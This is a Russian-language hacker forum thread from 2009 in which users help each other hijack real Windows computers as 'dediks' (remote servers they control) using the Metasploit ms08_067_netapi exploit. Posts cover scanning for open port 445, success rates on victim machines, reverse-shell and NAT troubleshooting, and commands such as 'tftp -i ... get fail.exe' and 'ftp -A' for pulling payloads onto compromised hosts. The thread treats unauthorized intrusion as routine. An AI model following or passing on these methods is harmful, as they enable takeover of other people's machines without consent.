Статьи Дедик или поможет нам Metasploit 3.2

Discussion in 'Статьи' started by stopxaker, 5 Jan 2009.

  1. HackerOK

    HackerOK Elder - Старейшина

    Joined:
    20 May 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    Отличная статейка, какраз дед нужен :)
     
  2. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    читай внимательнее я уже про это писал :



     
    1 person likes this.
  3. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    Сорь не заметил
     
  4. HackerOK

    HackerOK Elder - Старейшина

    Joined:
    20 May 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    Так вот вопрос...
    Запускаю МС GUI, появляться картинка типа идёт загрузка, при этом процесс отнимает у системы одно ядро и 2 гб оперы, повесит секунд 30 и исчезает... после этого нечего не открывается(всмысле сам МС) и процесс исчезает....в чем проблема ?
    ----
    Решил проблему, поставил вин 2к на виртуалку :D
     
    #84 HackerOK, 7 Jan 2009
    Last edited: 8 Jan 2009
  5. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    stopxaker
    Как друг, можешь мне в личку кидать один IP(на который у тебя шелл подключается), чтоб пробовать с моего компа через метасплоит подключается или нет? может проблема у меня, что я за NAT_ом сижу или что то еще?
    обешаю, не опубликовать и ничего не делать в дедике. просто как появится шелл - сразу закроюсь.
     
  6. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Добро , как только будет , тут же отпишу и кину в ПМ скрин , не вопрос ;)
     
    #86 stopxaker, 7 Jan 2009
    Last edited: 7 Jan 2009
  7. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    2 B1t.exe смотри в ПМ , там скрин на котором в данный момент висит шелл
     
  8. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    stopxaker

    спасибо конечно, но это не то, что я хотел. я хотел со своего проверить. ну и ладно, вот со скрина взял тот IP, на которого ты подключился и результат:
    а вообше у тебя там другой порт. т.е. место 445 другой (не пишу здесь какой).
     
    1 person likes this.
  9. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18

    порт там у меня 4444 это LPORT , а по поводу

    Code:
    22:55:11 - ms08_067_netapi [-] Exploit failed: The connection timed out (**.**.171.11:445). 
    Можешь со своего компа даже больше и не пробывать , я с такой же байдой месяц промыкался :( , и всем остальным пишу !!! Люди пока у вас сканер не покажет реально что открыт 445 порт как на моём скрине , даже и не дёргайтесь !!! Ищите сети в которых будет открыт это 445 порт , в аську не стучите , таких сетей не знаю , ищите сами !
     
  10. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    stopxaker
    можешь пожалуйста поподробней описать как ты туда проник, и вабще непонял немного если провы всё блокируют то по твоему способу ничего не получится сделать???
     
  11. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    stopxaker

    вообшето там у тебя 2526 порт был, но это уже не важно.
    У тебя щас есть такой IP, по которому реально подключится через шелл по 445 порту? я в цельях убеждений, что у меня все в порядке!?
     
  12. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    всё работает из сотни насканеных компов штук 20 с открытым портом 445 из этих 20 штук 15 уязвимы. НО при попытке соединения по ftp всё застревает на проверке имени пользователя сначала думал что остальное не отображается пробовал вводить пароль и дальше команды но скачка не идёт. что делать в этом случае? может использовать другой пэйлоад?
     
  13. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Так по поводу ftp , я уже писал , что фтп я настроил под anonymous без пароля , подошёл только такой способ , с паролями происходит висяк , тем боле на фиг нужен пароль , если всё равно фтп на дедике поднимать :

    [​IMG]

    Такое было когда был юзабельным LSA сплойт , в данном случае , из 20 компов на 3 если повезёт 5 можно поймать шелл :)
     
    #93 stopxaker, 8 Jan 2009
    Last edited: 8 Jan 2009
  14. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    дак когда anonymous всеравно требует мэйл в качестве пароля.
    проверил нащёт Triggering the vulnerability у жертвы в это время выскакивает сообщение об ошибке с запросом отправить отчёт об ошибке после чего комп жоска виснет.
     
  15. Daxa

    Daxa Banned

    Joined:
    2 Sep 2007
    Messages:
    3
    Likes Received:
    13
    Reputations:
    0
    отлично работает ! :) Спасибки вам! :*
     
    4 people like this.
  16. zeonx

    zeonx Banned

    Joined:
    8 Dec 2008
    Messages:
    27
    Likes Received:
    6
    Reputations:
    0
    tftp в этих случаях может помочь, можешь взять здесь , если стоишь за натом открывай порт 66, в cmd пишешь
    Code:
     tftp -i tvoi-ip-adress get fail.exe
    , -этот способ более удобный. У кого останаливается trigerring vulnerability.. сделайте порт форвардинг на 4444 порт(если вы стоите за НАТ), вырубите все фаеры у себя. Начинки **/http (через 80 порт), vnc, dllinject более реальные используйте их.
     
    #96 zeonx, 8 Jan 2009
    Last edited: 8 Jan 2009
  17. nepster

    nepster Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    96
    Likes Received:
    14
    Reputations:
    -1
    Открываешь cmd и пишешь одной строчкой ftp -n xxx.xxx.xxx.xxx . ххх- айпи твоего фтп.
     
    1 person likes this.
  18. NiGHt-LEshiY

    NiGHt-LEshiY Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    .
     
    #98 NiGHt-LEshiY, 8 Jan 2009
    Last edited: 27 Sep 2015
    1 person likes this.
  19. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    наконец нашёл способ! ftp -A ip сервера буква нужна большая потому что -a и -A это разные ключи.
     
  20. NiGHt-LEshiY

    NiGHt-LEshiY Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    .
     
    #100 NiGHt-LEshiY, 8 Jan 2009
    Last edited: 27 Sep 2015